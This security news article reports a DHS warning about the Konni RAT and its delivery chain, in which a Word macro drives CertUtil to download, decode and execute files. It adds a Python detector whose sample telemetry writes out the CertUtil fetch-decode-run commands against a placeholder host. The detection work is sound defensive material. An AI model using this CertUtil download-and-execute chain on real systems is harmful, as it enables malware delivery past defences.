Cybercriminals are increasingly using Konni, a remote administration tool (RAT), to launch malware attacks, according to a security warning issued by the U.S. Department of Homeland Security (DHS). Along with the Konni malware warning, the National Security Administration (NSA) and Federal Bureau of Investigation (FBI) this month issued a security warning regarding cybercriminals' use of Drovorub, a Russian malware strain.
Konni enables cybercriminals to steal files, capture keystrokes, take screenshots and execute arbitrary code on infected hosts, DHS stated. During Konni malware attacks, cybercriminals often deliver the malware via phishing emails carrying a Microsoft Word document that contains malicious VBA macro code. The malicious code changes the font color from light grey to black, determines whether the end user is running a 32- or 64-bit version of Windows, and constructs and executes a command line to download additional files.
After Konni's VBA macro constructs a command line, it uses the CertUtil certificate database tool to download remote files from a given Uniform Resource Locator (URL), DHS indicated. The malware then relies on CertUtil's built-in function for decoding base64-encoded files: it downloads a text file containing a base64-encoded string from a remote resource, decodes it with CertUtil and saves the result as a batch (.BAT) file, deletes the text file from the temp directory and executes the .BAT file.
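The chain DHS describes (an Office process spawning CertUtil to fetch a file, CertUtil decoding it to a .BAT in the temp directory, and the .BAT being executed) leaves a recognisable trail in process-creation telemetry. The following Python detector is an added example written for this article, not code from DHS or from the Konni malware: it parses a small, constructed set of process-creation events in a simplified pipe-delimited format (timestamp, pid, parent pid, image, command line; the field layout and all paths, pids and URLs are invented for the example), tags CertUtil download and decode invocations and temp-directory .BAT execution, and correlates them back to a common Office ancestor so that the full sequence is reported as one high-confidence finding rather than three isolated alerts. The `-urlcache` and `-decode` switches are real CertUtil options; the Office image names and the ancestry depth limit are assumptions.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Office images treated as macro-capable ancestors (assumption for this example).
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Constructed sample telemetry: ts|pid|ppid|image|cmdline (not real logs).
SAMPLE_LOG = r"""
# ts|pid|ppid|image|cmdline
2020-08-20T10:01:02Z|4120|3300|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"
2020-08-20T10:01:09Z|4188|4120|C:\Windows\System32\cmd.exe|cmd.exe /c certutil -urlcache -split -f http://download.invalid/p.txt C:\Users\alice\AppData\Local\Temp\p.txt
2020-08-20T10:01:09Z|4190|4188|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://download.invalid/p.txt C:\Users\alice\AppData\Local\Temp\p.txt
2020-08-20T10:01:11Z|4195|4120|C:\Windows\System32\cmd.exe|cmd.exe /c certutil -decode C:\Users\alice\AppData\Local\Temp\p.txt C:\Users\alice\AppData\Local\Temp\p.bat
2020-08-20T10:01:11Z|4197|4195|C:\Windows\System32\certutil.exe|certutil -decode C:\Users\alice\AppData\Local\Temp\p.txt C:\Users\alice\AppData\Local\Temp\p.bat
2020-08-20T10:01:12Z|4203|4120|C:\Windows\System32\cmd.exe|cmd.exe /c del C:\Users\alice\AppData\Local\Temp\p.txt
2020-08-20T10:01:13Z|4210|4120|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\alice\AppData\Local\Temp\p.bat
2020-08-20T10:05:40Z|5001|900|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f https://crl.example.invalid/root.crl C:\Temp\root.crl
2020-08-20T10:06:02Z|5100|900|C:\Windows\System32\certutil.exe|certutil -dump C:\Windows\System32\example.cer
"""

URL_RE = re.compile(r"https?://\S+", re.I)
# A .bat under a \Temp\ directory given directly as the cmd.exe /c or /k target.
TEMP_BAT_RE = re.compile(r'/[ck]\s+"?[^"\s]*\\temp\\[^"\s]+\.bat\b', re.I)


@dataclass
class Event:
    ts: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def parse_log(text: str) -> List[Event]:
    """Parse the pipe-delimited sample format; '#' lines are comments."""
    events = []
    for line in text.strip().splitlines():
        if not line or line.startswith("#"):
            continue
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(Event(ts, int(pid), int(ppid), image, cmdline))
    return events


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_ancestor(ev: Event, by_pid: Dict[int, Event], max_depth: int = 8) -> Optional[int]:
    """Walk the parent chain (only through processes seen in the log) to find an Office ancestor."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return None
        if basename(parent.image) in OFFICE_IMAGES:
            return parent.pid
        cur = parent
    return None


def classify(ev: Event) -> List[str]:
    """Tag the individual behaviours that make up the CertUtil download/decode/execute chain."""
    cmd = ev.cmdline.lower()
    tags = []
    if "certutil" in cmd:
        if "-urlcache" in cmd and URL_RE.search(ev.cmdline):
            tags.append("certutil_download")
        if "-decode" in cmd:
            tags.append("certutil_decode")
    if basename(ev.image) == "cmd.exe" and TEMP_BAT_RE.search(ev.cmdline):
        tags.append("temp_bat_exec")
    return tags


def detect(text: str) -> Dict[int, dict]:
    """Group tagged events by Office ancestor (or by their own pid) and flag the full chain."""
    events = parse_log(text)
    by_pid = {e.pid: e for e in events}
    findings: Dict[int, dict] = defaultdict(lambda: {"tags": set(), "events": [], "office_parent": False})
    for ev in events:
        tags = classify(ev)
        if not tags:
            continue
        root = office_ancestor(ev, by_pid)
        key = root if root is not None else ev.pid
        findings[key]["tags"].update(tags)
        findings[key]["events"].append(ev)
        findings[key]["office_parent"] = root is not None
    full_chain = {"certutil_download", "certutil_decode", "temp_bat_exec"}
    for f in findings.values():
        f["chain"] = f["office_parent"] and full_chain <= f["tags"]
    return dict(findings)


if __name__ == "__main__":
    for root, f in detect(SAMPLE_LOG).items():
        level = "HIGH (Office-spawned CertUtil chain)" if f["chain"] else "review"
        print(f"root pid {root}: {level} tags={sorted(f['tags'])} events={len(f['events'])}")
```

In the sample, the WINWORD.EXE process (pid 4120) collects all three tags from its descendants and is reported as a full chain, while the standalone CertUtil download (pid 5001) with no Office ancestor is surfaced for review only; a plain `certutil -dump` produces no finding at all. In production the same logic would consume Sysmon Event ID 1 or EDR process-creation records rather than this constructed format.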
How to Mitigate Konni Malware Attacks
DHS offers security recommendations to help organizations mitigate Konni malware attacks, including:
- Keep antivirus software and operating system patches up to date
- Deactivate file and printer sharing services
- Limit end-user permissions and prevent users from installing and running unwanted software applications
- Develop and implement a password policy
- Encourage employees to exercise caution when opening email attachments; workers should not open attachments from unknown senders
- Leverage firewalls
- Track users' web browsing habits
Separately, cybercriminals encrypted data in two-thirds of malware attacks in the first quarter of 2020, research from network security provider WatchGuard revealed. By partnering with MSSPs, organizations can guard against Konni malware and other cyberattacks and limit the risk that their data is stolen and encrypted during these attacks.